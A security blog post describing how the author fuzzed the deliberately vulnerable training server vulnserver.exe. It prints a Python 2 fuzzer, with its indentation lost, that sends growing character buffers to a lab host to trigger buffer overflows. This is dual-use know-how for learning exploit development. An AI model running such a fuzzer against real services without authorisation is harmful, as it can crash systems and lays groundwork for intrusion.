Through searching for information about buffer overflows and exploiting them I found "vulnserver.exe" created by "The Grey Corner" @ http://www.thegreycorner.com/2010/12/introducing-vulnserver.html.
Then I began fuzzing the vulnserver.exe and built the following fuzzer using python, it can be adapted to fuzz other programs by modifying the source code that is listed below.
#!/usr/bin/python
import socket
def optionsMenu(currentCommand, currentChar, currentSize, currentMulti):
print 'Select from the Following Options: '
print '1. List Commands'
print '2. Set Command - "' + currentCommand + '"'
print '3. Set Character or String ("' + currentChar + '")'
print '4. Set String Initial Size ("' + currentChar + '"*' + str(currentSize) + ')'
print '5. Set String Multiplier (("' + currentChar + '"*' + str(currentSize) + ')*' + str(currentMulti) + ')'
print '6. Run Fuzzer'
print '9. Exit'
menuOpt = raw_input('>> ')
return menuOpt
def listCommands(conn):
print
conn.send(('HELP' + '\r\n'))
print conn.recv(1024)
def setString(currentChar):
print
print 'Current Character or String: ' + currentChar
newChar = raw_input('Set Character> ')
return newChar
def setSize(currentSize):
print
print 'Current Initial Size of String: ' + str(currentSize)
newSize = raw_input('Set Size> ')
return newSize
def setMultiplier(currentMulti):
print
print 'Current Multiplier of String: ' + str(currentMulti)
newMulti = raw_input('Set Multiplier> ')
return newMulti
def funcCommand(currentCommand):
print
print 'Current Command: ' + currentCommand
newCommand = raw_input('Set Command> ')
return newCommand
def runFuzzer(conn, currentCommand, currentChar, currentSize, currentMulti):
print
for i in range(0, int(currentMulti)):
buffer = currentCommand + ' '
#buffer = currentCommand + ' .'
buffer += currentChar * (int(currentSize) * (i+1))
buffer += '\r\n'
#print buffer
conn.send((buffer))
print 'Sent: ' + currentCommand + ' .("' + currentChar + '"*' + str(currentSize) + ')*' + str(i+1) + ' Size of buffer: ' + str(len(buffer))
print conn.recv(1024)
print
def main():
global s
setCommand='STATS'
setChar='A'
initialSize=50
intMultiplier=1
menuOption = '0'
while menuOption <> '9':
print
menuOption = optionsMenu(setCommand, setChar, initialSize, intMultiplier)
if menuOption == '1':
listCommands(s)
elif menuOption == '2':
listCommands(s)
setCommand = funcCommand(setCommand)
elif menuOption == '3':
setChar = setString(setChar)
elif menuOption == '4':
initialSize = setSize(initialSize)
elif menuOption == '5':
intMultiplier = setMultiplier(intMultiplier)
elif menuOption == '6':
runFuzzer(s, setCommand, setChar, initialSize, intMultiplier)
elif menuOption == '9':
break
else:
listCommands(s)
server = '172.16.102.132'
sourcePort = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sourcePort))
# The following line can be uncommented if you need to send first
print s.recv(1024)
main()
s.close()
Subscribe to:
Post Comments (Atom)
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist... -
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them... -
I ran a Nikto scan and found the following vulnerability in the report that it produces: "OSVDB-637: Enumeration of users is possible...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th... -
In the honeypot I found over 276 requests for cgi files that could be accessed to leverage the shellshock vulnerability documented as CVE-20...
No comments:
Post a Comment